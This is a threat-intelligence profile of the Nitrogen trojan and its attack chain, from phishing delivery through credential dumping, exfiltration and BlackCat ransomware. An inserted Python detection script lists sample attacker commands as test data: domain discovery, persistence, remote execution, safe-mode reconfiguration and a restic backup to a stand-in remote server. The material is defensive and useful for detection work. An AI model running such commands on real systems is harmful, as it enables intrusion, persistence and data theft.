| Nitrogen | |
|---|---|
| Type of Malware | Trojan |
| Targeted Countries | United States |
| Date of Initial Activity | 2023 |
| Motivation | Data Theft |
| Attack Vectors | Phishing |
| Targeted Systems | Windows |
| Type of Information Stolen | Login Credentials |
Overview
Nitrogen malware is a sophisticated and stealthy piece of malicious software that has recently gained attention due to its involvement in targeted cyberattacks. Known for its ability to evade detection and employ a variety of post-exploitation tools, Nitrogen has proven to be a formidable weapon in the hands of cybercriminals. This malware is part of an increasingly concerning trend where attackers leverage legitimate software, such as network utilities and remote management tools, to conceal malicious activities, making detection significantly more challenging for defenders.
The Nitrogen malware is particularly notable for its use in multi-stage attack chains, often starting with a seemingly innocuous download that is delivered through social engineering techniques like malvertising or phishing. Once executed, it acts as a backdoor, granting threat actors persistent access to compromised systems. The malware’s ability to drop additional payloads, such as Sliver and Cobalt Strike, further escalates its impact, enabling attackers to carry out complex post-exploitation activities. These include lateral movement, credential theft, data exfiltration, and, in some cases, the deployment of ransomware, as demonstrated in recent campaigns.
Targets
- Information
- Individuals
How they operate
The initial access point for Nitrogen malware often begins with a drive-by download facilitated through malvertising or phishing campaigns. The attackers use fraudulent websites or tampered versions of legitimate software, such as network utilities like Advanced IP Scanner, to deliver a malicious ZIP file. This file typically contains an executable designed to exploit the victim’s trust in the legitimate software. Once the ZIP file is extracted and the executable is run, the malware installs itself on the system, often masquerading as a legitimate Python binary. This executable side-loads a specially crafted Python Dynamic Link Library (DLL) that triggers the execution of Nitrogen’s malicious code.
Upon execution, Nitrogen drops additional payloads to escalate the attack. One of the key components that Nitrogen deploys is the Sliver beacon, a post-exploitation framework commonly used by cybercriminals to maintain control over the compromised system. This beacon, along with Cobalt Strike, is loaded into memory using a technique known as “Py-Fuscate.” Py-Fuscate obfuscates Python scripts, making them difficult for traditional antivirus tools to detect. By hiding its payloads in memory and avoiding traditional file-based detection methods, Nitrogen can establish a persistent foothold on the compromised system without raising suspicion.
Once the malware is active, it performs extensive discovery and enumeration of the compromised environment. Nitrogen utilizes a combination of Windows utilities, including net, ipconfig, and nltest, along with more advanced tools like PowerSploit and SharpHound, to map out the network and gather valuable information about the domain controllers, local and domain administrators, and other network configurations. By doing so, the attackers can identify key systems and escalate their privileges, allowing them to move laterally within the network and access more sensitive assets.
The malware’s lateral movement is facilitated by tools such as Impacket’s wmiexec, which allows the attacker to execute commands remotely on other machines within the network. After compromising additional machines, the attackers repeat the same persistence techniques—creating scheduled tasks and modifying registry keys—ensuring that the malware remains active and undetected across the environment. Nitrogen also performs credential dumping, often targeting LSASS (Local Security Authority Subsystem Service) memory, to harvest login credentials for high-privilege accounts, further expanding the attacker’s control over the compromised network.
Once the attackers have sufficient access to critical infrastructure, Nitrogen deploys other tools to exfiltrate data or prepare for final stages of the attack. One such tool is the open-source backup software, Restic, which is used to exfiltrate files from file shares to remote servers controlled by the attackers. This phase often involves significant stealth, as the attackers may lay low for days, monitoring backup systems and network configurations before executing their ultimate objective.
The final phase of the attack involves the deployment of BlackCat ransomware, which is distributed across the network once the attackers have gained full control. The ransomware binary is copied to and executed on compromised hosts using tools like PsExec and the Windows copy utility. The final payload is designed to encrypt files on infected systems and display ransom notes demanding payment for decryption keys. The attackers also take measures to ensure that the ransomware runs in a safe mode environment, making it harder for users to intervene and stop the encryption process.
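As an added detection example (not code from the original page), the following Python checks constructed process-creation events against the behaviours described in this section: the masquerading Python binary launched from a user-writable folder, net/nltest domain discovery, wmiexec-style remote execution, scheduled-task and Run-key persistence, Restic pushing to a remote repository, and safe-mode reconfiguration. The wmiexec output-redirect pattern and the use of bcdedit for safe boot are assumptions about how those steps typically appear in telemetry, not details stated above.

```python
import re

def base(image):
    """Lower-cased file name of a Windows image path."""
    return image.rsplit("\\", 1)[-1].lower()

# Constructed sample events (parent image, image path, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("explorer.exe", r"C:\Users\u\Downloads\AdvIPScanner\python.exe", "python.exe"),
    ("python.exe", r"C:\Windows\System32\nltest.exe", "nltest /dclist:corp"),
    ("python.exe", r"C:\Windows\System32\net.exe", 'net group "Domain Admins" /domain'),
    ("WmiPrvSE.exe", r"C:\Windows\System32\cmd.exe",          # assumed wmiexec shape
     r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1700000000.1 2>&1"),
    ("cmd.exe", r"C:\Windows\System32\schtasks.exe",
     r"schtasks /create /tn Updater /tr C:\ProgramData\python.exe /sc onlogon"),
    ("cmd.exe", r"C:\Windows\System32\reg.exe",
     r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v upd /d C:\ProgramData\python.exe"),
    ("cmd.exe", r"C:\ProgramData\restic.exe", r"restic -r rest:http://203.0.113.10:8000/ backup \\fs01\share"),
    ("cmd.exe", r"C:\Windows\System32\bcdedit.exe", "bcdedit /set {default} safeboot network"),  # assumed
    ("explorer.exe", r"C:\Program Files\Python311\python.exe", "python.exe script.py"),  # benign
]

USER_WRITABLE = re.compile(r"\\(Downloads|Temp|AppData|ProgramData)\\", re.I)

# Each rule is (name, predicate over parent, image, command line).
RULES = [
    ("python_from_user_writable_dir",
     lambda p, i, c: base(i) == "python.exe" and bool(USER_WRITABLE.search(i))),
    ("domain_recon_lolbin",
     lambda p, i, c: base(i) in {"net.exe", "net1.exe", "nltest.exe"}
                     and bool(re.search(r"domain admins|/dclist|/domain_trusts", c, re.I))),
    ("wmiexec_output_redirect",
     lambda p, i, c: p.lower() == "wmiprvse.exe" and r"\\127.0.0.1\ADMIN$" in c and "2>&1" in c),
    ("scheduled_task_persistence", lambda p, i, c: base(i) == "schtasks.exe" and "/create" in c.lower()),
    ("run_key_persistence",
     lambda p, i, c: base(i) == "reg.exe" and bool(re.search(r"currentversion\\run", c, re.I))),
    ("restic_remote_backup",
     lambda p, i, c: base(i) == "restic.exe" and bool(re.search(r"\s-r\s+(rest:|sftp:|s3:)", c, re.I))),
    ("safeboot_reconfiguration", lambda p, i, c: base(i) == "bcdedit.exe" and "safeboot" in c.lower()),
]

def evaluate(events):
    """Return (rule name, image) for every event that matches a rule."""
    return [(name, image) for parent, image, cmdline in events
            for name, pred in RULES if pred(parent, image, cmdline)]

def matched_rules(events):
    """Distinct rule names that fired, sorted, to summarise how much of the chain was seen."""
    return sorted({name for name, _ in evaluate(events)})

if __name__ == "__main__":
    for name, image in evaluate(SAMPLE_EVENTS):
        print(f"{name:32} {image}")
```

Several of these rules (for example the scheduled-task one) will fire on legitimate administration on their own; the value is in seeing multiple stages fire on the same host within a short window.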
Overall, Nitrogen malware is a highly advanced and multi-faceted threat that leverages a combination of social engineering, obfuscation, and post-exploitation tools to maintain persistence and achieve its objectives. Its ability to evade traditional detection methods and move laterally within networks makes it a dangerous threat for organizations, particularly those lacking advanced threat detection capabilities. Organizations must implement robust security measures, including behavioral monitoring, network segmentation, and regular credential audits, to defend against such sophisticated attacks.